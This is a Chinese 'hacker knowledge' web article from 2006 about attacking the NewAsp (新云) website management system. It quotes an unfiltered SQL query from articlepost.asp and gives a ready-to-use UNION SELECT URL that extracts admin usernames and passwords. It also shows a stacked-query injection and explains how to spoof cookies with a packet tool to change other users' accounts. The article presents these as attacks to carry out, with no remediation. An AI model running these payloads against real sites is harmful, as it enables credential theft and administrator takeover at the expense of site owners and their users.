首 页
┆
源码下载
┆
IT学院
┆
字体下载
┆
模板下载
┆
源码发布
┆
广告合作
┆
网站地图
┆
虚拟主机
┆
中文域名
►
设为首页
►
加入收藏
►
联系我们
源码下载
>>
ASP源码
|
PHP源码
|
ASP.net源码
|
JSP源码
|
CGI源码
|
VC/C++源码
|
VB源码
|
Delphi源码
|
Flash源码
文章学院
>>
网络编程
|
网页设计
|
图形图象
|
数据库
|
服务器
|
网络媒体
|
网络安全
|
操作系统
|
办公软件
|
软件开发
|
黑客知识
字体下载
>>
精制字体
|
非英字体
|
艺术字体
|
著名字体
|
哥特式
|
简单字体
|
手写体
|
节假日
|
图案字体
|
精度像素
|
中文字体
模板下载
>>
企业门户
|
数码网络
|
休闲娱乐
|
影视音乐
|
旅游名胜
|
文化艺术
|
电子商务
|
个性展示
|
登陆导航
|
Flash模板
源码搜索
文章搜索
字体搜索
模板搜索
►►
您当前的位置:
源码园
→
IT学院
→
黑客知识
→
黑客进阶
→ 文章内容
新云网站管理系统文件注入漏洞--新云,网站,管理系统,文件,注入,漏洞
作者:佚名 来源:网上收集 发布时间:2006-12-13 21:24:25
关于新云
新云网络成立于2002年,是一家提供现代网络服务、软件开发的网络公司,主要从事网络应用软件开发、电子商务系统开发,程序订制、网站开发、网站策划、域名注册、空间租用等多项业务,为企业打造卓越的网络应用平台。
漏洞原理
利用各种方法实现入侵,如COOKIES、抓包、注入检测等。
1.过滤未全
user\articlepost.asp 文件第333行
SQL = "select ArticleID,title,content,ColorMode,FontMode,Author,ComeFrom,
WriteTime,username from NC_Article where ChannelID=" & ChannelID & " And
username=’" & Newasp.MemberName & "’
And ArticleID=" & Request("ArticleID")
没有任何过滤,只有用户是否有权限发文章的检查。综合代码原理可构造URL语句:
articlepost.asp?ChannelID=1&action=view&ArticleID=1%20union%20select%
201,2,3,4,5,username,password,8,9%20from%20nc_admin
注册后直接在浏览器上输入,就可以爆出管理员的表和代码。
2.新云2.1SQL版注入漏洞
漏洞描述:
动画频道的“动画管理”和“审核管理”,错误类型:
Microsoft OLE DB Provider for SQL Server (0x80040E14)
未能找到存储过程 ’NC_FlashAdminList’。
/admin/admin_Flash.asp, 第 233 行
可以利用SQL注入方法,手工&工具,这个就不用我教了吧。如:
articlepost.asp?ChannelID=1&action=view&ArticleID=1;--
3.COOKIES欺骗获取管理账号
攻击者只需使用WSockExpert等工具抓包修改资料时的信息,编辑用户名及ID信息后用NC提交即可修改指定的用户信息。
[] [
返回上一页
] [
打 印
]
上一篇文章:
如何针对Yahoo搜索进行网站优化--Yahoo,搜索,网站,优化
下一篇文章:
二个非常规ASP木马--ASP,木马
相关文章:
Php动态函数注入漏洞--Php,动态函数,注入,漏洞
如何寻找动网插件的注入漏洞--寻找,动网插件,注入,漏...
蓝雨设计整站SQL注入漏洞--蓝雨设计整站,SQL,注入,漏...
攻防实战:注入漏洞的利用和防范--攻防实战,注入,漏...
SQL注入漏洞攻防必杀技--SQL,注入,漏洞,攻防,必杀技...
新云网站系统新漏洞的入侵过程--新云,网站,系统,漏洞...
[图文]
新云网站管理系统articlepost.asp文件注入漏洞...
FipsCMS Index.ASP 批量SQL注入漏洞--FipsCMS,Index...
BBSxp<=7.0 Beta2 SQL注入漏洞--BBSxp,SQL,注入,漏洞...
新云网站管理系统文件注入漏洞--新云,网站,管理系统...
f2blog最新注入漏洞--f2blog,注入,漏洞
php注入漏洞专题--php,注入,漏洞
关于本站
-
网站帮助
-
广告合作
-
下载声明
-
友情连接
-
网站地图
-
源码发布
Copyright © 2003-2009
Ymyasp
.Com
. All Rights Reserved .
备案序号:粤ICP备07029071号